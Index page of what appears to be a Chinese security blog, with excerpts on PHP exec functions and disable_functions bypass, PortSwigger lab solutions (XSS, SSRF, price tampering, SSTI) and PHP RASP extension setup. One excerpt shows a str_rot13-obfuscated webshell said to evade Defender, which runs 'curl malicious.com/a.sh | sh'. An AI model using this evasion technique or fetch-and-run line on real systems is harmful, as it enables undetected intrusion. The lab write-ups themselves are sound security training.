網頁安全

在戳 Webshell 時，時常會被 Disable Function 給雷，而網路上的各種 Cheat Sheet 也常常會教我們， Bypass Disable Function 的其他函數。這邊先不考慮 LD_PRELOAD 或是其他奇技淫巧的繞過方法，我們從最常見的 6 種可執行系統指令的 Function 開始，探討它們在正常使用時的不同。明明功能都差不多，甚至一樣，為什麼 PHP 要定義出這麼多的函數呢？ ~~因為 PHP 是一個非常 Hacker Friendly 的語言，有各種方法可以讓駭客繞繞繞！~~~ 本文會比較 system、shell_exec、exec、passthru、popen 以及 proc_open 等 Function 的差異。 system 讓我們從 system 函數開始，觀察 Spec 可以看出，官方的敘述。 system — Execute an external program and display the output system 指令會執行外部程式，並且直接把結果輸出 (類似於 echo 到螢幕上)，這邊也有一個特性就是，當程式每輸出一行，畫面結果就會刷新一次 (儘管程式可能還沒結束)。 system 指令有兩個參數，分別是 $command 以及 &$result_code。$command 應該不用特別敘述，而 &$result_code 會使用 Pass by reference 方式把 Linux 的 Return Status Code 給回傳到該參數。 ...

我覺得 XSS 的題目都有一點通，還有一點無聊 QQ Lab: Reflected XSS into HTML context with nothing encoded 題目敘述 This lab contains a simple reflected cross-site scripting vulnerability in the search functionality. To solve the lab, perform a cross-site scripting attack that calls the alert function. 題目解釋 在搜尋功能的反射性 XSS 解答 在搜尋上面打 alert(1) Lab: Stored XSS into HTML context with nothing encoded 題目敘述 This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the blog post is viewed. ...

原本想隨便寫一個 Webshell 測試使用，但一下就被 Defender 吃掉了 "str_ro" // "str_ro"."t13" => "str_rot13" // ("system")(("str_rot13")($e)) => system(str_rot13($e)) // system(str_rot13($e)) => system("curl malicious.com/a.sh | sh") 在 VirusTotal 上竟然 All pass ㄏ

要做這個主要是碩論的研究跟 RASP 有一點點關係，而 PHP RASP 需要透過 PHP Extenstions 來進行編譯以及使用，所以本文主要會記錄一些基本的 PHP Extenstions 的撰寫以及開發方式。 本文會需要使用到的環境 任意 Linux 或 WSL 搭配 Docker Docker Ubuntu 20.04 PHP 7.3.33 Source Code 環境建置 在安裝好 Ddocer 後，理論上一鍵就可以建置好乾淨的 Ubuntu 20.04 docker，理論上-v 的部分可以自己修改掛載點 sudo docker run -it -v /home/steven/compile-rasp/mount_point:/mount_point ubuntu:20.04 接下來可以安裝一些之後可能會用到的小工具 apt update apt install wget unzip software-properties-common -y apt-add-repository ppa:ondrej/php apt install php7.3-dev -y 途中 software-properties-common 的安裝過程可能會跳出一些東西，就照著回答就好了。 接下來下載 php 相關的程式碼 cd mount_point wget https://www.php.net/distributions/php-7.3.33.tar.gz tar zxvf php-7.3.33.tar.gz chmod -R 777 * # 因為我在 Docker 外使用 Mount，這樣處理權限比較簡單 建立第一個 Extension 要寫 Extenstion，第一件事情是需要先建立一個 Extension，在原始碼路徑中 php-7.3.33/ext 中，有一個名為 ext_skel.php 的檔案，skel 是 skeleton (骨架) 的縮寫，也就是讓我們建立一個軀殼。 ...

Lab: Basic SSRF against the local server 題目敘述 This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. 題目解釋 任意發 HTTP GET Request 解答 觀察 Stock check 的 API 發現他會去戳 http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 改送 http%3a%2f%2flocalhost%2fadmin 發現就能看到 admin 介面 再送 http%3A%2F%2Flocalhost%2Fadmin%2Fdelete%3Fusername%3Dcarlos Lab: Basic SSRF against another back-end system 題目敘述 This lab has a stock check feature which fetches data from an internal system. ...

Lab: Excessive trust in client-side controls 題目敘述 This lab doesn’t adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a “Lightweight l33t leather jacket”. You can log in to your own account using the following credentials: wiener:peter 題目解釋 竄改 POST 內容 解答 在加入購物車時會順便 POST 價格 POST /cart HTTP/1.1 Host: acd31fa31fe0b3dcc04314f500560069.web-security-academy.net Cookie: session=IxPR6nrwBtk0VSUHVKPDmBuwG2IJVK8z User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net Referer: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net/product?productId=1 Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 X-Originating-Ip: 127.0.0.1 X-Remote-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Te: trailers Connection: close productId=1&redir=PRODUCT&quantity=1&price=133700 竄改成 1 再去購物車結帳就好ㄌ ...

Lab: Manipulating WebSocket messages to exploit vulnerabilities 題目敘述 This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent’s browser. 題目解釋 練習用 Burp 抓 Websockets 解答 用 Burp 抓包後，上面有一個 Websockets history 把資料丟到 Repeater 之後改輸入 {"user":"You","content":" "} Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 題目敘述 This online shop has a live chat feature implemented using WebSockets. ...

Lab: Unprotected admin functionality 題目敘述 This lab has an unprotected admin panel. Solve the lab by deleting the user carlos. 題目解釋 沒有限制的 admin 面板 解答 從 robots.txt 可以看到 /administrator-panel，進去刪帳號 Lab: Unprotected admin functionality with unpredictable URL 題目敘述 This lab has an unprotected admin panel. It’s located at an unpredictable location, but the location is disclosed somewhere in the application. Solve the lab by accessing the admin panel, and using it to delete the user carlos. ...

Lab: Basic server-side template injection 題目敘述 This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template. To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory. 題目解釋 題目說是 ERB 的 SSTI 解答 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 會回傳 49 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 可以取得使用者名稱 https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= 順利刪除檔案 Lab: Basic server-side template injection (code context) 題目敘述 This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory. ...

Lab: Information disclosure in error messages 題目敘述 This lab’s verbose error messages reveal that it is using a vulnerable version of a third-party framework. To solve the lab, obtain and submit the version number of this framework. 題目解釋 想辦法讓他噴 Error 可能可以洩漏版本號 解答 https://acf81fed1ef0e1cbc040196e00b300c0.web-security-academy.net/product?productId=asd 就會噴出 Apache Struts 2 2.3.31 Lab: Information disclosure on debug page 題目敘述 This lab contains a debug page that discloses sensitive information about the application. To solve the lab, obtain and submit the SECRET_KEY environment variable. ...